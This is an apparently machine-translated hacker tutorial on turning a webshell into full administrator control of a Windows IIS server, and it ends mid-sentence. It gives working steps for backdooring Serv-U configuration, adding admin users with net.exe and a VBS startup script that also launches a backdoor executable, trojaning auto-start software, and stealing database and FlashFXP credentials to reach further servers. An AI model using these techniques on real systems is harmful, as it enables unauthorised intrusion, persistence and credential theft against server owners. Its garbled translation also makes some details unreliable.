Author: Scarecrow QQ: 16285939
I spent the strength of the nine cow and two tiger got a Webshell. Of course, I still want to continue to get the Administration of the entire server. Just as I don't want to get admin, it is not a hacker ~ 嘻嘻 ~~ Good to tell me, see what can be used Come to improve permissions ***************************************************** ******************************************************************************************** We are convenient, to the Documents and Settings / All Users / Application Data / Symantec / PcAnywhere / Symantec / Pcanywhere / Symantec / PcAnywhere / Symantec / PcAnywhere to use the PCANywhere connection to OK *************** *********************************************************** ********** The second there are many small blacks. I will ask me to improve the Webshell's IIS USER permission. The management of the general server is that this machine is designed and then uploaded to the space, then use FTP, The server is using the most use of Servu. So we use Servu to upgrade permissions to use Servu upgrade privileges to be written ~
Good to start, first pass the servudaemon.ini under the WEBSHELL to install him down, then install a servu on this machine to put servudaemon.ini to the local installation folder override, start the servu to add a user, Set to the system administrator, directory C: /, with an executable permission and then go to the Servudaemon.ini to replace the Servudaemon.ini.
Connect to my newly built users and passwords ~ Ok, or connect FTPFTP> Open IP Connected to IP.220 Serv-U FTP Server V5.0.0.4 for Winsock Ready ... User (IP: (NONE)): ID // User Just added 331 User Name Okay, please send Complete e-mail address as password.password: password // password 230 user logged in, proceed.ftp> cd winnt // Winnt directory 250 Directory Changed To / WinNTFTP> CD System32 // Enter System32 Directory 250 Directory Changed to / Winnt / System32FTP> Quote Site Exec Net.exe User Rover Rover1234 / Add // Adding users using the system's NET.EXE file.
If prompted no permissions, then we will pass the back door (Server.exe) and then write a VBS. SET WSHSHELL = CreateObject ("wscript.shell") a = wshshell.run ("cmd.exe / c net user user Pass / add ", 0) b = wshshell.run (" cmd.exe / c net localgroup administrators user /add" ,0 )b=wshshell.run ("cmd.exe / c server.exe", 0)
The role of this urban education is to establish a user password for pass and enhance the server.exe under the SYSTEM32 directory and then execute this tutorhe. C: / documents and settings / all users / "Start" menu / The program / start directory This administrator will execute the teaching book as long as one landing. The next is waiting. Waiting for him to log in. ********************** *********************************************************** ** Third is to check what system services, or the software that starts automatically started from the system and administrators, such as Norton, Vadministrator, Jinshan, Rising, WinRar, and even QQ, whether you can write, if you can To modify its program, bind a batch or VBS, then wait for the server to restart. *********************************************************** ************************* Find conn and config, PASS this type of file can get the password of SA or MySQL, possibly There will be a harvest, etc. *********************************************************** ************************ The fifth use of FlashFXP can also improve the permissions, but the success rate looks at your own luck first find the flashfxp folder. Open (edit) sites. Dat, this file is what the password and user name, and the password is added. If I put these files back to the local, it is my computer, replacing my local corresponding file. Then you will find that open FlashFXP is the same in the site manager in the site. Can you add N to a broiler ~~ 嘻嘻 ~
Well? ? No, it's coming to improve the permissions, halo, and then went to waste in halfway. Let's take a look at the other administrator's site manager, have a username and password, and the password is an asterisk. After viewing with the XP asterisk Password viewer, then encrypting the password in sites.dat is not encrypted, but the password is not encrypted, and the password is displayed, and then the password of this website administrator is finally found from this pile. come out. Then the next step can be linked to these new servers ~~ Test As long as you replace the SITES.DAT file containing the password and the username to the local corresponding file, you can restore each site of each site of the other party. *********************************************************** **************************fifth
Win2K IIS5.0 By default, the application protection option is "shared)", when IIS loads ISAPI is executed by the IWAM_CompUterName user. But by default, Win2K IIS5 is loaded with SYSTEM for some special ISAPI. Win2K IIS5, WIN2K IIS5 SP1, WIN2K IIS5 SP2 is simple to determine the file name of ISAPI, and no directory restrictions, ISAPI loaded with system permissions: 1, idq.dll2, httpext.dll3, httpodbc .dll4, ssinc.dll5, msw3prt.dll6, author.dll7, admin.dll8, shtml.dll9, sspifilt.dll10, compfilt.dll11, pwsdata.dll12, md5filt.dll13, fpexedll.dll
So this is easy to get SYSTEM permissions. And when it is determined that the file name has a bug, such as request /scripts/test
